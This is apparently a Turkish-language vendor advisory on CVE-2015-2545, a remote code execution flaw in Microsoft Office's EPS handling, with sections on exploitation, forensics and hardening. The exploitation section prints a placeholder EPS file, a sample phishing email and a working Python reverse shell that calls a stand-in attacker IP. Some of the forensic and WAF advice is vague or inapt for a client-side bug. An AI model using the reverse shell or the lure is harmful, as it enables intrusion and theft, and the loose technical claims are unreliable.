CVE-2015-2545 · Bilgilendirme

Microsoft Office Malformed EPS File Vulnerability

CVE-2015-2545, Microsoft Office'teki bir zafiyetle uzaktan kod yürütme riski taşır. EPS görüntüleriyle saldırılar gerçekleştirilebilir.

Üretici
Microsoft
Ürün
Office
Seviye
yüksek
Yayın Tarihi
05 Nisan 2026
Okuma
9 dk okuma

CVE-2015-2545: Microsoft Office Malformed EPS File Vulnerability

Zorluk Seviyesi: Orta | Kaynak: CISA KEV

Zafiyet Analizi ve Giriş

CVE-2015-2545, Microsoft Office uygulamalarında tespit edilen önemli bir güvenlik açığıdır. Bu zafiyet, özel olarak hazırlanmış bir EPS (Encapsulated PostScript) dosyasının işlenmesi sırasında oluşan bir hata nedeniyle uzaktan kod yürütme (RCE – Remote Code Execution) imkanı sunmaktadır. İlk olarak 2015 yılında ortaya çıkan bu zafiyet, Microsoft'un çeşitli Office sürümlerini etkileyerek kullanıcıların bilgisayarlarını tehlikeye atmıştır.

Zafiyetin temelinde, Microsoft'un EPS formatındaki görsel dosyalarını işleyen bileşenlerinde bulunan bir hata yatmaktadır. EPS dosyaları, sıklıkla grafik tasarım ve baskı süreçlerinde kullanılır ve içinde vektör grafik bilgi barındırır. Zafiyet, bu dosyaların analiz edilmesi sırasında bir dizi hata olasılığına yol açmakta; hackerlar, manipüle edilmiş EPS dosyalarını kullanarak sistemde zararlı kod çalıştırabilmektedir. Özellikle, bu tür dosyaların birçok kullanıcı tarafından sıkça kullanılması, potansiyel riskleri artırmaktadır.

Gerçek dünya senaryolarında, bu zafiyetin etkileri oldukça geniş bir yelpazeye yayılabilir. Örneğin, bir tasarım stüdyosu düşünelim; burada grafik tasarımcıları, çizim ve tasarım işlemleri için sıklıkla EPS dosyalarına ihtiyaç duyar. Eğer bir saldırgan, bu stüdyonun bilgisayar sistemlerine sızmak amacıyla kötü niyetli bir EPS dosyası gönderirse, tasarımcı dosyayı açtığında sistemde uzaktan kod yürütme gerçekleşebilir. Bu durum, işletmenin kritik verilerine, müşteri bilgilerine ve tasarım projelerine erişim sağlanmasıyla sonuçlanabilir.

CWE-20 (Giriş Verisi Doğrulama Hatası) ile ilişkilendirilen bu zafiyet, kullanıcıların güvenlik önlemlerini göz ardı etmesine neden olabilir. Özellikle eğitim ve sağlık sektörlerinde, bu tür güvenlik açıklarına maruz kalmanın ciddi sonuçları olabilir. Eğitim kurumları, öğrenci kayıtları ve mali verileri saklamakta, sağlık sektörü ise hasta bilgilerini içermektedir; her iki durumda da özel bilgilerin ifşası, hem itibari hem de hukuki açıdan büyük zararlar verebilir.

Microsoft, bu zafiyeti tespit ettikten kısa bir süre sonra güncellemeler yayınlayarak etkilenen sürümler için yamalar oluşturmuştur. Ancak, kullanıcıların bu güncellemeleri uygulayıp uygulamadıkları büyük bir önem taşımaktadır. Zira birçok kullanıcı, günlük iş akışları içinde güncellemeleri ihmal edebilir, bu da sistemlerinin hâlâ risk altında kalmasına neden olur.

Zafiyetin etkileri, dünya genelinde ofis uygulamaları kullanan her sektörde hissedilebilir. Özellikle kamu, finans ve sağlık sektörleri, siber saldırılara karşı dikkatli olmalı ve bu tür açıkları en aza indirmek için güvenlik stratejileri geliştirmelidir. Kullanıcıların da farkında olması gereken hususlar arasında, açılmadan önce e-posta eklerini ve belgeleri dikkatlice incelemek, tanımadıkları kaynaklardan gelen dosyaları açmamaları ve her zaman en güncel yazılım sürümlerini kullanmaları bulunmaktadır.

Sonuç olarak, CVE-2015-2545 zafiyeti, çeşitli sektörlerdeki kullanıcıları hedef alan ciddi bir güvenlik açığıdır. Bu duruma karşı alınacak önlemler, yalnızca bireysel kullanıcıların değil, aynı zamanda kurumların da siber güvenlik stratejilerini güçlendirmeleri açısından büyük bir öneme sahiptir. Bilginin korunması, sadece bir zorunluluk değil, aynı zamanda günümüz dijital çağında bir gereklilik haline gelmiştir.

Teknik Sömürü (Exploitation) ve PoC

Microsoft Office, EPS (Encapsulated PostScript) dosyaları ile bağlantılı ciddi bir güvenlik açığına sahiptir. CVE-2015-2545 olarak bilinen bu zafiyet, uzaktan saldırganların kötü niyetli bir EPS görüntüsü aracılığıyla sistem üzerinde rastgele kod çalıştırmalarına (RCE - Uzaktan Kod Yürütme) olanak tanır. Bu tür zafiyetler, kötü niyetli kişilerin hedef sistemlerde yetki kazanmalarını sağlar ve bu durum son derece tehlikelidir. Bu bölümde, bu zafiyetin nasıl sömürülebileceği üzerine detaylı bir açıklama yapacağız.

Sömürü süreci, genellikle bir hedefin belirlenmesiyle başlar. Bu aşamada, belirli bir hedef sistemin Microsoft Office kullanıp kullanmadığını ve hangi sürümün kullanıldığını tespit etmek önemlidir. Zafiyet, Office’in belirli sürümlerinde mevcut olduğundan, bu bilgi kritik öneme sahiptir. Hedef sistemin zafiyeti barındırdığını doğruladıktan sonra, sömürü aşamasına geçebiliriz.

Zafiyetin sömürü süreci üç aşamadan oluşur:

  1. Zayıf EPS Dosyasının Oluşturulması: İlk adım, hatalı yapıya sahip bir EPS dosyası hazırlamaktır. Burada, EPS dosyasına eklenecek kodun dikkatlice tasarlanması gerekir. Aşağıda basit bir EPS dosyası örneği verilmiştir. Bu örnek, sistem üzerinde kod yüklemeyi planlayan bir araştırmacı tarafından kullanılabilir.
   %!PS-Adobe-3.0 EPSF-3.0
   %%BoundingBox: 0 0 100 100
   /nop { 0 } bind def
   /mycode {
       % Kötü niyetli kod buraya eklenir
   } def
   nop

Yukarıdaki örnekte, mycode adındaki defanisyon içerisine kötü niyetli bir kod yerleştirilmelidir.

  1. Kötü Niyetli EPS Dosyasının Yayılması: Zafiyeti hedef alacak EPS dosyası hazırlandıktan sonra, bunu hedef kullanıcıya ulaştırmak gerekmektedir. Bu adım genellikle sosyal mühendislik taktikleriyle gerçekleştirilir. Hedef kişiye e-posta yoluyla veya zararlı bir web sitesi üzerinden bu dosyayı indirtme amaçlanır. E-posta gönderimi sırasında, dosyanın güvenilir bir kaynak tarafından geldiğini düşündürecek şekilde bir mesaj yazmak faydalı olabilir. Örneğin:
   Subject: Önemli Belge
   Merhaba,
   Lütfen ekteki belgeyi inceleyin. Herhangi bir sorunuz olursa benimle iletişime geçebilirsiniz.
   Saygılar,
   [Gönderenin Adı]
  1. Sistemde Code Execution (Kod Yürütme): Hedef, kötü niyetli EPS dosyasını açtıktan sonra, saldırganın hazırladığı kod sistem üzerinde yürütülmeye başlanacaktır. Eğer başarılıysa, bu durum artık saldırganın hedef sistemde kontrol sahibi olduğu anlamına gelir.

Sömürü sonrasında genellikle bir geri dönüş bağlantısı (reverse shell) oluşturulması hedeflenir. Buna örnek olarak aşağıdaki Python kodu verilebilir:

import socket
import os
import subprocess

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("attackers_ip", port))  # Saldırganın IP adresi ve portunu buraya ekleyin.
os.dup2(s.fileno(), 0)  # stdin
os.dup2(s.fileno(), 1)  # stdout
os.dup2(s.fileno(), 2)  # stderr
p = subprocess.call(["/bin/sh", "-i"])  # Shell komutu açılır

Bu kod parçası, saldırganın belirlediği IP adresi ve port üzerinden sisteme bağlanmasını sağlamaktadır.

Sonuç olarak, CVE-2015-2545, uzaktan kod yürütme zafiyetine neden olan bir açığı temsil eder. Bu tür zafiyetlerin varlığı, siber güvenlik alanında dikkatle izlenmeli ve her türden kullanıcıya yönelik yalnızca güvenilir kaynaklardan dosya açmaları konusunda eğitim verilmelidir. Ayrıca, bu tür zafiyetlerin keşfi ve sömürü teknikleri, siber güvenlik uzmanları tarafından sürekli geliştirilmelidir, böylece potansiyel tehditlere karşı önlemler alınabilir.

Forensics (Adli Bilişim) ve Log Analizi

CVE-2015-2545, Microsoft Office yazılımındaki bir zafiyet olup, kötü amaçlı olarak hazırlanmış EPS (Encapsulated PostScript) dosyalarının işlenmesi sırasında uzaktan kod yürütülmesine (RCE - Remote Code Execution) olanak tanır. Bu zafiyet, saldırganların hedef sistemde zararlı yazılımlar çalıştırmasına ve veri sızdırılmasına yol açabilir. Zafiyetten yararlanmak için, saldırganların öncelikle hedef kullanıcının bilgisayarına bu tür bir EPS dosyasını göndermesi gerekir. Kullanıcı bu dosyayı açtığında, dosya içinde yer alan kötü amaçlı kod çalıştırılır ve bu, saldırganın kontrolünde olan bir ortam sağlar.

Adli bilişim özelinde bu tür bir saldırının izlerini sürmek için gerekli olan log analizi ve SIEM (Security Information and Event Management) sistemlerinin kullanımı oldukça kritik bir öneme sahiptir. Bir siber güvenlik uzmanı, zafiyetin istismar edildiğine dair ipuçlarını tespit etmek amacıyla şu adımları izleyecektir:

Öncelikle, sistem günlüklerinde (log) dikkat edilmesi gereken unsurlar arasında "Access log" ve "Error log" dosyaları bulunmaktadır. Bu dosyaların incelenmesi, şüpheli davranışların ve anormal etkinliklerin tespit edilmesinde önemli bir rol oynamaktadır. Özellikle EPS dosyalarının yüklendiği veya açıldığı anlara dair log kayıtları, bu tür saldırıları analiz etmek için başlangıç noktası oluşturur. Örneğin, "Open" işlemine dair log girdileri incelenebilir. Şüpheli bir EPS dosyasının açıldığı anlarda, sıklıkla belirli IP adresleri üzerinden erişim sağlanmış olması, tehlikeli olabilecek bir durumu işaret edebilir.

Ayrıca, dosya yükleme geçmişini ve bu dosyaların çalıştırılma zamanlarını belirlemek için dosya hash'leri izlenmelidir. Bu süreçte, known bad hash (bilinen kötü hash) listeleri ile karşılaştırmalar yapmak, kötü amaçlı dosyaları daha hızlı tespit etmeye yardımcı olabilir. Log analiz araçları, genellikle bu tür praktykler için özel olarak geliştirilmiştir ve saldırının başlama zamanı, hedef sistem bilgileri, dosya tipi ve boyutu gibi parametreleri de göz önünde bulundurarak anormal davranışları belirleyebilir.

Bir diğer önemli nokta, OpenOffice veya benzeri alternatif yazılımlarda da açılan EPS dosyaları ile ilgili logların izlenmesidir. Bu tür yazılımlar, belirli bir dosya türü ile etkileşime geçtiğinde yetkilendirilmemiş RCE'ler (Remote Code Execution - Uzaktan Kod Yürütme) oluşturabilir. Dolayısıyla, bu tür yazılımların logları da kontrol edilebilir.

SIEM sistemleri, yukarıda bahsedilen tüm verileri toplar ve analiz ederken anormallikleri, tehlikeli dosya yüklemelerini, veya şüpheli kullanıcı aktivitelerini gerçek zamanlı olarak izleyebilir. Özellikle Event ID'ler ve oturum süreleri, kötü niyetli aktivitelerin daha hızlı tespit edilmesine yardımcı olacaktır. Bir saldırı analisti, bu günlükleri inceleyerek belirli bir zaman diliminde gerçekleşen tüm EPS dosyası açma eylemlerini gözden geçirebilir.

Son olarak, sistemde yarı zamanlı veya tam zamanlı çalışan bir güvenlik duvarı, bu tür saldırıların önüne geçebilir. Güvenlik duvarının kuralları, belirli üzgün IP adreslerinden gelen EPS dosyası yüklemesini engelleyebilir. Kötü amaçlı yazılımlar genellikle belirli IP'lerden gelir, dolayısıyla bu IP'lerin listelenmesi ve engellenmesi önemlidir.

Bu tür zafiyetlere karşı etkin bir koruma sağlamak için sürekli güncellemeler, bilinçlendirme eğitimleri ve güvenlik bilinci oluşturma çalışmaları da yapılmalıdır. Eğitimlerden elde edilecek bilgi ve analiz kabiliyeti, adli bilişim uzmanlarının olayları önceden tespit etmesini sağlayacak ve sistem güvenliğini artıracaktır.

Savunma ve Sıkılaştırma (Hardening)

Microsoft Office ürünlerinde bulunan CVE-2015-2545 zafiyeti, kötü niyetli bir EPS (Encapsulated PostScript) dosyası aracılığıyla uzaktan saldırganların sistemlerde keyfi kod çalıştırmasına (Remote Code Execution - RCE) olanak tanır. Saldırganlar, bu tür bir zafiyetten yararlanarak kullanıcıların Office uygulamalarında açtıkları dosyaları hedef alabilirler. Bu senaryoda, kullanıcılar bir EPS dosyasını açtıklarında, kötü niyetli kod otomatik olarak çalıştırılır ve saldırgan, kurbanın cihazına erişim sağlayabilir.

Saldırganlar, zafiyetin potansiyelini görmekte gecikmez. Özellikle, hedeflerinde yüksek erişimli kullanıcılar (örneğin finans uzmanları veya yöneticiler) olduğunda, bu tür bir saldırının etkisi oldukça yıkıcı olabilir. Örneğin, bir şirketin mali verilerine erişim sağlayan bir çalışan, bu tür bir dosyayı yanlışlıkla açarsa, şirketin finansal verileri veya gizli bilgiler sızdırılabilir.

Bu tür zafiyetlerden korunmak için sıkılaştırma ve savunma mekanizmalarının uygulanması hayati önem taşır. İlk faktör, Microsoft Office yazılımının güncel tutulmasıdır. Yazılım güncellemeleri, güvenlik açıklarını kapatmanın en etkili yoludur. Dolayısıyla, kullanıcıların düzenli olarak Office'in en son sürümünü yüklemeleri ve güvenlik yamalarını uygulamaları gerekir. Ayrıca, bu tür dosyaların açılmasına izin vermek için kurulu olan yazılımlar üzerinde kısıtlamalar ve önlemler almak da önemlidir.

Firewall (yangın duvarı) ve WAF (Web Application Firewall - Web Uygulama Güvenlik Duvarı) kullanmak, sistemlerin korunmasına yardımcı olabilir. WAF ayarları ile EPS dosyalarına yönelik özel kurallar oluşturulabilir. Örneğin aşağıdaki gibi bir kural, belirli dosya uzantılarının yüklenmesini engelleyebilir:

SecRule REQUEST_HEADERS:Content-Type "application/postscript" "id:1000001,phase:1,deny,status:403"

Bu kural, belirli bir içerik türü (EPS dosyası) tespit edildiğinde isteği reddedecektir. Ek olarak, WAF altyapısında çalışacak diğer koruma katmanları da eklenebilir. Örneğin, kullanıcıların yüklediği tüm dosyalar üzerinde bir virüs tarayıcı kullanmak, potansiyel tehditleri tespit etmek için önemlidir.

Kalıcı sıkılaştırma (hardening) önerileri arasında, Office uygulaması için dosya açma izinlerini en düşük seviyeye çekmek bulunmaktadır. Bu, özellikle belirli klasörlerde dosya yükleme ve açma yetkilerini kısıtlamak için önemlidir. Ayrıca, sistemin kullanıcılarını yalnızca gerekli olan izinlerle sınırlamak, potansiyel etkileri azaltabilir.

Diğer bir savunma mekanizması, içerik filtrelemesi uygulamaktır. Kuruluş içindeki e-posta sistemlerinde ve dosya paylaşım platformlarında, EPS gibi riskli dosya türlerinin gönderilmesini veya alınmasını engelleyen filtreleme kuralları oluşturulabilir. Bu, hem iç hem de dış tehditlerden koruma sağlar.

Son olarak, çalışanlara düzenli olarak güvenlik eğitimi verilmesi, potansiyel sosyal mühendislik saldırılarına karşı farkındalığı artırır ve zafiyetlerin istismar edilme olasılığını azaltır. Dikkatli kullanım alışkanlıkları geliştirmek, kullanıcıların kötü niyetli dosyaları tanıyabilme becerilerini artırır ve olası saldırıların önüne geçebilir.

Kısacası, CVE-2015-2545 gibi zafiyetlere karşı etkili bir savunma ve sıkılaştırma stratejisi oluşturmak, hem güncellemeleri almak, firewall ve WAF ayarlarını optimize etmek, kalıcı sıkılaştırma önlemlerini uygulamak ve kullanıcıları eğitmek ile mümkün olacaktır. CyberFlow platformu üzerinde bu tür önlemlerin hayata geçirilmesi, organizasyonun güvenlik duruşunu önemli ölçüde artıracaktır.